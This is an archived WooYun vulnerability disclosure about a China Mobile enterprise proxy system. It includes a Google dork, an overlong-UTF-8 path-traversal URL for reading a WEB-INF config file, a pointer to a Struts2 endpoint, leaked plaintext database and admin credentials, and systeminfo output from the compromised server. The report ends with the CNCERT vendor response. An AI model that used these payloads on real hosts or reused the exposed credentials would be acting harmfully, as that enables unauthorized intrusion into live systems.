当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0163911

漏洞标题:中国移动某系统存在漏洞

相关厂商:中国移动

漏洞作者: 陆由乙

提交时间:2015-12-23 19:18

修复时间:2016-02-09 23:29

公开时间:2016-02-09 23:29

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-23: 细节已通知厂商并且等待厂商处理中
2015-12-27: 厂商已经确认,细节仅向厂商公开
2016-01-06: 细节向核心白帽子及相关领域专家公开
2016-01-16: 细节向普通白帽子公开
2016-01-26: 细节向实习白帽子公开
2016-02-09: 细节向公众公开

简要描述:

.。。。。。。。

详细说明:

企业代理服务器--中国移动
目录历遍:**.**.**.**/mms/
google:intitle:企业代理服务器--中国移动
**.**.**.**/%c0%ae/WEB-INF/monitor.xml

<logonConfig><cltLogonCfg><clientID>0101</clientID><clientName>MASMONITOR</clientName><passWord>123456</passWord><port>9002</port></cltLogonCfg></logonConfig>


http://**.**.**.**/%c0%ae/WEB-INF/monitor.xml
**.**.**.**/%c0%ae/WEB-INF/monitor.xml
**.**.**.**/%c0%ae//WEB-INF/monitor.xml
还有一个st2.
**.**.**.**:8088/MAS/randomImageAction.action

st2.jpg


st3.jpg


HWdbIP=**.**.**.**
HWdbIP=**.**.**.**
HWdbName=CustomSMS
HWdbPassword=SqlMsde@InfoxEie2000
HWsourceAddr=106573165037
HWserviceID=MHE0010501
HWfeeType=02
HWfeeCode=20
HWUserName=admin
HWpassword=2552027+2554034
DestinationAddress=106573165037+admin

漏洞证明:

QQ截图20151223164259.jpg

24H,8G这个开了3个月的机了,也不歇歇。
不愧是移动,一台主机占这么多IP。
C:\Users\admin$>systeminfo
主机名: WIN-4ASJL16FS7D
OS 名称: Microsoft Windows Server 2008 R2 Enterprise
OS 版本: 6.1.7600 暂缺 Build 7600
OS 制造商: Microsoft Corporation
OS 配置: 独立服务器
OS 构件类型: Multiprocessor Free
注册的所有人: Windows 用户
注册的组织:
产品 ID: 55041-266-0003407-84898
初始安装日期: 2015/8/31, 15:13:03
系统启动时间: 2015/9/7, 8:58:38
系统制造商: HP
系统型号: ProLiant DL385 G7
系统类型: x64-based PC
处理器: 安装了 2 个处理器。
[01]: AMD64 Family 16 Model 9 Stepping 1 AuthenticAMD ~2100 M
z
[02]: AMD64 Family 16 Model 9 Stepping 1 AuthenticAMD ~2100 M
z
BIOS 版本: HP A18, 2010/6/15
Windows 目录: C:\Windows
系统目录: C:\Windows\system32
启动设备: \Device\HarddiskVolume1
系统区域设置: zh-cn;中文(中国)
输入法区域设置: zh-cn;中文(中国)
时区: (UTC+08:00)北京,重庆,香港特别行政区,乌鲁木齐
物理内存总量: 8,188 MB
可用的物理内存: 618 MB
虚拟内存: 最大值: 16,374 MB
虚拟内存: 可用: 3,458 MB
虚拟内存: 使用中: 12,916 MB
页面文件位置: C:\pagefile.sys
域: WORKGROUP
登录服务器: \\WIN-4ASJL16FS7D
修补程序: 暂缺
网卡: 安装了 4 个 NIC。
[01]: Broadcom BCM5709C NetXtreme II GigE (NDIS VBD 客户端)
连接名: 本地连接
启用 DHCP: 否
IP 地址
[01]: **.**.**.**
[02]: **.**.**.**
[03]: **.**.**.**
[04]: **.**.**.**
[05]: **.**.**.**
[06]: **.**.**.**
[07]: **.**.**.**
[08]: **.**.**.**
[09]: **.**.**.**
[10]: **.**.**.**
[11]: **.**.**.**
[12]: **.**.**.**
[13]: **.**.**.**
[14]: **.**.**.**
[15]: **.**.**.**
[16]: **.**.**.**
[17]: **.**.**.**
[18]: **.**.**.**
[19]: **.**.**.**
[20]: **.**.**.**
[21]: **.**.**.**
[22]: **.**.**.**
[23]: **.**.**.**
[24]: **.**.**.**
[25]: **.**.**.**
[26]: **.**.**.**
[27]: **.**.**.**
[28]: **.**.**.**
[29]: **.**.**.**
[30]: **.**.**.**
[31]: **.**.**.**
[32]: **.**.**.**
[33]: **.**.**.**
[34]: **.**.**.**
[35]: **.**.**.**
[36]: **.**.**.**
[37]: **.**.**.**
[38]: **.**.**.**
[39]: **.**.**.**
[40]: **.**.**.**
[41]: **.**.**.**
[42]: **.**.**.**
[43]: **.**.**.**
[44]: **.**.**.**
[45]: **.**.**.**
[46]: **.**.**.**
[47]: **.**.**.**
[48]: **.**.**.**
[49]: **.**.**.**
[50]: **.**.**.**
[51]: **.**.**.**
[52]: **.**.**.**
[53]: **.**.**.**
[54]: **.**.**.**
[55]: **.**.**.**
[56]: **.**.**.**
[57]: **.**.**.**
[58]: **.**.**.**
[59]: **.**.**.**
[60]: **.**.**.**
[61]: **.**.**.**
[62]: fe80::1519:e1cb:286:6e7c
[02]: Broadcom BCM5709C NetXtreme II GigE (NDIS VBD 客户端)
连接名: 本地连接 2
状态: 媒体连接已中断
[03]: Broadcom BCM5709C NetXtreme II GigE (NDIS VBD 客户端)
连接名: 本地连接 3
状态: 媒体连接已中断
[04]: Broadcom BCM5709C NetXtreme II GigE (NDIS VBD 客户端)
连接名: 本地连接 4
状态: 媒体连接已中断

wj.jpg

涉及各种企业。

修复方案:

。。。

版权声明:转载请注明来源 陆由乙@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2015-12-27 22:33

厂商回复:

CNVD确认所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置。

最新状态:

暂无


漏洞评价:

评价